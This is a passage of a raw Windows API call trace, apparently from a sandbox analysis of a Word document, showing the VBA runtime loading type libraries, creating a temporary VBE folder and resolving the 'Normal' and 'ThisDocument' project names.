Shared\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 69 [0045.152] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3", pptlib=0x2074c0*=0x0 | out: pptlib=0x2074c0*=0x8191590) returned 0x0 [0045.157] ITypeLib:GetTypeInfoOfGuid (in: This=0x8191590, GUID=0x7fee4038ed0, ppTInfo=0x207650 | out: ppTInfo=0x207650*=0x81f8a68) returned 0x0 [0045.158] ITypeInfo:RemoteGetTypeAttr (in: This=0x81f8a68, ppTypeAttr=0x2075a0, pDummy=0x0 | out: ppTypeAttr=0x2075a0, pDummy=0x0) returned 0x0 [0045.158] ITypeInfo:LocalReleaseTypeAttr (This=0x81f8a68) returned 0x0 [0045.158] ITypeInfo:RemoteGetTypeAttr (in: This=0x81f8a68, ppTypeAttr=0x207540, pDummy=0x0 | out: ppTypeAttr=0x207540, pDummy=0x0) returned 0x0 [0045.158] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x2073e0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0045.158] _access (_FileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", _AccessMode=0) returned 0 [0045.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x2072a0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0045.159] lstrlenA (lpString="VBE") returned 3 [0045.159] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0045.159] _msize (_Block=0x25a7f70) returned 0x26 [0045.159] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0045.159] lstrlenA (lpString="VBE") returned 3 [0045.159] _msize (_Block=0x25a7fa0) returned 0x26 [0045.159] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0045.159] lstrlenA (lpString="VBE") returned 3 [0045.159] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpString2="VBE" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" [0045.159] strcpy_s (in: _Dst=0x25ab7a0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0045.159] _access_s (_FileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x2 [0045.161] strcpy_s (in: _Dst=0x25ab7a0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0045.161] _mkdir (_Path="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0 [0045.162] strcpy_s (in: _Dst=0x25ab7a0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0045.162] strcpy_s (in: _Dst=0x25ab7a0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0045.162] strcpy_s (in: _Dst=0x25ab7a0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0045.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x25ab7a0, cbMultiByte=-1, lpWideCharStr=0x207240, cchWideChar=41 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 41 [0045.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", cchWideChar=-1, lpMultiByteStr=0x2074e0, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", lpUsedDefaultChar=0x0) returned 41 [0045.162] _access_s (_FileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x0 [0045.163] IUnknown:AddRef (This=0x81f8a68) returned 0x2 [0045.163] ITypeInfo:LocalReleaseTypeAttr (This=0x81f8a68) returned 0x0 [0045.163] StringFromCLSID (in: rclsid=0x25ab75c*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a)), lplpsz=0x207510 | out: lplpsz=0x207510*="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 0x0 [0045.163] IMalloc:Alloc (This=0x7feff045380, cb=0x27) returned 0x7dfefa0 [0045.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", cchWideChar=-1, lpMultiByteStr=0x7dfefa0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", lpUsedDefaultChar=0x0) returned 39 [0045.163] IMalloc:Free (This=0x7feff045380, pv=0x7f18130) [0045.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x207520, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0045.163] lstrlenA (lpString="VBE") returned 3 [0045.163] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 38 [0045.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x207510, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0045.163] wsprintfA (in: param_1=0x25a7e20, param_2="%s;%s;&H%08lX" | out: param_1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0045.163] wsprintfA (in: param_1=0x207538, param_2="&H%08lX" | out: param_1="&H00000001") returned 10 [0045.163] lstrcpynA (in: lpString1=0x25ab7c0, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0045.164] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0045.164] lstrcpyA (in: lpString1=0x25aba00, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0045.164] IMalloc:Free (This=0x7feff045380, pv=0x7dfefa0) [0045.164] GetCurrentThreadId () returned 0x94c [0045.164] GetCurrentThreadId () returned 0x94c [0045.164] IMalloc:Alloc (This=0x7feff045380, cb=0x28) returned 0x7dfefa0 [0045.164] GetCursorPos (in: lpPoint=0x207760 | out: lpPoint=0x207760*(x=571, y=137)) returned 1 [0045.164] GetCapture () returned 0x0 [0045.164] WindowFromPoint (Point=0x870000023c) returned 0x201c6 [0045.164] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x94c [0045.164] SendMessageA (hWnd=0x201c6, Msg=0x84, wParam=0x0, lParam=0x87023c) returned 0x1 [0045.164] SendMessageA (hWnd=0x201c6, Msg=0x20, wParam=0x201c6, lParam=0x2000001) returned 0x1 [0045.165] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0045.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0045.165] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0045.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=9, lpWideCharStr=0x7e02308, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0045.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x207740, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.165] IsCharAlphaA (ch=78) returned 1 [0045.165] lstrlenA (lpString="Normal") returned 6 [0045.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x207760, cbMultiByte=-1, lpWideCharStr=0x25a9120, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0045.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2075f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0045.165] lstrlenA (lpString="Normal") returned 6 [0045.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x207760, cbMultiByte=-1, lpWideCharStr=0x25a9120, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0045.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2075b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0045.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0045.166] lstrlenA (lpString="Normal") returned 6 [0045.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2075a0, cbMultiByte=-1, lpWideCharStr=0x207520, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0045.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x207460, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0045.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x207470, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0045.166] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0045.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0045.167] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0045.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=9, lpWideCharStr=0x7e02308, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0045.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x207550, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0045.167] lstrcmpA (lpString1="Project1", lpString2="Normal") returned 1 [0045.167] lstrcmpiA (lpString1="Project1", lpString2="Normal") returned 1 [0045.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x207450, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.167] lstrcmpiA (lpString1="Project1", lpString2="Normal") returned 1 [0045.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0045.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x207350, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0045.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3952a3e, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0045.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3952a3e, cbMultiByte=8, lpWideCharStr=0x7e02c68, cchWideChar=8 | out: lpWideCharStr="Project1") returned 8 [0045.167] GetLocalTime (in: lpSystemTime=0x2071f0 | out: lpSystemTime=0x2071f0*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x3ab)) [0045.167] wcsncpy_s (in: _Destination=0x206ea0, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.167] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206dd0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.168] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.168] GetLocalTime (in: lpSystemTime=0x2071f0 | out: lpSystemTime=0x2071f0*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x3ab)) [0045.168] wcsncpy_s (in: _Destination=0x206ea0, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.168] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206dd0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.168] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x207260, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0045.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x207260, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x207120, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0045.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0045.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0045.168] IMalloc:Alloc (This=0x7feff045380, cb=0x30) returned 0x7d55650 [0045.168] IMalloc:Free (This=0x7feff045380, pv=0x7f180d0) [0045.168] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfeeb0 [0045.168] IMalloc:Realloc (This=0x7feff045380, pv=0x7dfeeb0, cb=0x50) returned 0x7f180d0 [0045.168] IMalloc:Free (This=0x7feff045380, pv=0x7d55650) [0045.169] wcsncpy_s (in: _Destination=0x206f20, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.169] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206e50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.169] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.169] strcpy_s (in: _Dst=0x7fd6810, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0045.169] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0045.169] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=7, lpWideCharStr=0x7dfeeb8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0045.169] lstrlenA (lpString="Normal") returned 6 [0045.169] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0045.169] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=7, lpWideCharStr=0x7dfeeb8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0045.169] lstrlenA (lpString="Normal") returned 6 [0045.174] lstrcmpiW (lpString1="Normal", lpString2="") returned 1 [0045.176] wcscpy_s (in: _Destination=0x2073c6, _SizeInWords=0x105, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0045.176] _wcsicmp (_String1="*\\CNormal", _String2="*\\Z035e399ea6") returned -23 [0045.176] IUnknown:AddRef (This=0x7edf740) returned 0x4 [0045.176] IUnknown:QueryInterface (in: This=0x7edf740, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206e28 | out: ppvObject=0x206e28*=0x0) returned 0x80004002 [0045.176] IUnknown:Release (This=0x7edf740) returned 0x3 [0045.176] IUnknown:AddRef (This=0x3dd7b80) returned 0x5 [0045.176] IUnknown:QueryInterface (in: This=0x3dd7b80, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206e28 | out: ppvObject=0x206e28*=0x0) returned 0x80004002 [0045.176] IUnknown:Release (This=0x3dd7b80) returned 0x4 [0045.176] IUnknown:AddRef (This=0x7ee0550) returned 0x5 [0045.176] IUnknown:QueryInterface (in: This=0x7ee0550, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206e28 | out: ppvObject=0x206e28*=0x0) returned 0x80004002 [0045.176] IUnknown:Release (This=0x7ee0550) returned 0x4 [0045.176] wcsncpy_s (in: _Destination=0x206af0, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.176] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206a20, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.176] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.176] wcsncpy_s (in: _Destination=0x206af0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0045.176] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0045.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206a20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0045.176] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0045.177] wcscpy_s (in: _Destination=0x814d918, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0045.177] wcsncpy_s (in: _Destination=0x206af0, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.177] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206a20, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.177] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\Z035e399ea6") returned 0 [0045.177] wcsncpy_s (in: _Destination=0x206b30, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0045.177] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0045.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206a60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0045.177] wcscpy_s (in: _Destination=0x80792e0, _SizeInWords=0x108, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0045.178] _wfullpath (in: _Buffer=0x207340, _Path="Normal", _BufferCount=0x104 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop\\Normal") returned="C:\\Users\\aETAdzjz\\Desktop\\Normal" [0045.178] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\Normal", lpString2="") returned 1 [0045.179] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0045.179] SysStringByteLen (bstr="潎浲污") returned 0x6 [0045.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e02c68, cbMultiByte=7, lpWideCharStr=0x7dfeeb8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0045.179] lstrlenA (lpString="Normal") returned 6 [0045.179] ITypeInfo:RemoteGetDocumentation (in: This=0x7f722f0, memid=-1, refPtrFlags=0x2076d8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x25a7fa8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x25a7fa8*="\x91e4\xe3eb\x7fe") returned 0x0 [0045.179] IUnknown:Release (This=0x7f722f0) returned 0x0 [0045.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=-1, lpMultiByteStr=0x2076b0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0045.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=-1, lpMultiByteStr=0x207690, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0045.179] IsCharAlphaA (ch=84) returned 1 [0045.180] lstrlenA (lpString="ThisDocument") returned 12 [0045.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2076f0, cbMultiByte=-1, lpWideCharStr=0x25a7f70, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0045.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x207530, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0045.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.180] lstrlenA (lpString="ThisDocument") returned 12 [0045.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2076f0, cbMultiByte=-1, lpWideCharStr=0x25a7f70, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0045.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2074f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0045.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.180] lstrlenA (lpString="ThisDocument") returned 12 [0045.180] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72190, ppTypeAttr=0x2074e0, pDummy=0x0 | out: ppTypeAttr=0x2074e0, pDummy=0x0) returned 0x0 [0045.180] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72190) returned 0x0 [0045.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2076f0, cbMultiByte=-1, lpWideCharStr=0x207550, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0045.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x207170, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0045.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, 